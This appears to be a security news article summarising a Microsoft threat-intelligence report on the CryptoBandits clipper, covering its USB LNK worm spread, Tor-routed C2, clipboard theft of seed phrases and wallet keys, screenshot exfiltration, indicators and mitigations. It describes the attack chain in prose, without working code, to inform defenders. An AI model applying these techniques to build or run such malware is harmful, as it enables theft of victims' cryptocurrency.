Microsoft Threat Intelligence has uncovered a sophisticated cryptocurrency clipper campaign dubbed CryptoBandits, active since February 2026, that combines clipboard hijacking, USB-based worm propagation, Tor-anonymized command-and-control (C2) communications, and remote code execution to silently drain victims’ crypto wallets.
Unlike conventional clipboard stealers, this malware operates as a dual-purpose tool: a financially motivated stealer and a lightweight backdoor that can receive runtime instructions from a hidden .onion server while monitoring victims’ clipboards every 500 milliseconds.
Microsoft Defender Antivirus detects this threat under the signature Trojan:Win32/CryptoBandits.A and Trojan:JS/CryptoBandits.A, with multiple variants confirmed in the wild.
The campaign is categorized as a clipper malware attack, a class of malicious software that silently intercepts clipboard data and replaces cryptocurrency wallet addresses before a user pastes them into a transaction, rerouting funds to attacker-controlled wallets.
What makes CryptoBandits exceptionally dangerous is its architectural sophistication. It does not rely on a traditional installer or static IP-based C2 infrastructure.
Instead, it bundles its own portable Tor client (ugate.exe), routes all traffic through a local SOCKS5 proxy on localhost:9050, and blends data theft with remote code execution, giving operators both immediate financial returns and persistent backdoor access.
The attack begins when a victim plugs in or receives an infected USB storage device containing a malicious Windows Shortcut (.LNK) file.
Clicking the shortcut triggers a worm component that first checks if the device is already compromised; if not, it silently fetches the payload from a .onion C2 address via Tor.
Stage 1 — USB Worm Propagation:
The LNK payload scans the USB drive for common document types (.doc, .xlsx, .pdf), hides the original files, and replaces them with identically named malicious shortcuts that link to the worm.
When the next user opens what appears to be a harmless Word or PDF document, they unknowingly execute the malware. The worm also deploys two scheduled tasks for persistence: one to spread to newly inserted USB drives and another to maintain the stealer component.
Stage 2 — Defense Evasion:
All components are encrypted and decrypted only at runtime, with the installer obfuscated using PyArmor and packaged via PyInstaller.
The malware queries the Win32_Process WMI class and immediately terminates if Task Manager is detected among running processes, hindering manual triage.
Stage 3 — Clipper and Stealer Activation:
The clipper component, built on Windows Script Host (WSH) and ActiveXObject, launches the renamed Tor binary in a hidden window, waits ~60 seconds for Tor to bootstrap, generates a unique victim GUID, and registers the infected host with its hidden C2. From this point, the malware enters an infinite loop.
The malware polls the clipboard every 500 milliseconds, targeting a wide range of high-value cryptographic assets:
- 12-word and 24-word BIP39 seed phrases
- Ethereum private keys and Bitcoin WIF keys
- Bitcoin Legacy, P2SH, Bech32, and Taproot wallet addresses
- Tron and Monero wallet addresses
Address replacement is carefully designed to reduce suspicion that the attacker’s substituted wallet address partially matches the first or last characters of the legitimate one.
For example, a Bitcoin Bech32 address starting with “bc1q” is replaced with one that matches only the last character, making quick visual detection nearly impossible.
Beyond clipboard theft, the malware captures five screenshots every ten seconds and exfiltrates them to the C2 via curl routed through Tor. If the C2 server responds with an EVAL command, the malware executes arbitrary attacker-supplied JavaScript on the victim system, enabling full remote code execution.
The C2 infrastructure is built entirely on .onion domains, preventing conventional DNS-based blocking and IP reputation filtering. Communication uses HTTP over Tor via a SOCKS5 proxy, with curl POST requests carrying action tags such as SEED (exfiltrated seed phrase), PKEY (private key), REPL (wallet address replacement notification), and EVAL (remote code execution instruction).
Microsoft identified the following confirmed C2 .onion domains:
| Indicator | Type | Description |
|---|---|---|
cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion | Domain | C2 Server |
facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion | Domain | C2 Server |
ugate.exe | Filename | Portable Tor Binary |
7630debd35cac6b7d58c4427695579b3e3a8b1cc462f523234cd6c698882a68c | SHA-256 | Crypto Clipper Worm |
MITRE ATT&CK Techniques
The campaign maps to several MITRE ATT&CK tactics:
- T1091 – Replication Through Removable Media (USB LNK delivery)
- T1059 – Command and Scripting Interpreter (WSH/EVAL-driven RCE)
- T1115 – Clipboard Data (seed phrase and wallet theft)
- T1090 – Proxy (Tor SOCKS5 routing)
- T1053.005 – Scheduled Task/Job (persistence)
- T1113 – Screen Capture (PowerShell screenshot exfiltration)
Mitigation
Microsoft recommends that defenders prioritize behavioral detection over static signatures, as malware’s multilayer runtime obfuscation defeats most signature-based tools.
Immediate defensive actions include:
- Disable AutoRun/AutoPlay for all removable media
- Block .LNK file execution from USB drives via Group Policy Objects (GPOs)
- Restrict unnecessary use of
wscript.exe,cscript.exe - Hunt for localhost:9050 Tor proxy activity in network telemetry
- Monitor
curl.exeusage with--socks5-hostnameflags - Alert on PowerShell-based screen capture and suspicious child processes spawned by script interpreters
- Review clipboard and screenshot behaviors on devices used for cryptocurrency transactions
Microsoft Defender XDR can detect this campaign through alerts, including Suspicious JavaScript process, Possible data exfiltration using Curl, and Behavior:Win64/CurlOnion.STA.
Site: thecybrdef.com
For more insights and updates, follow us on Google News, Twitter, and LinkedIn.
About the Author
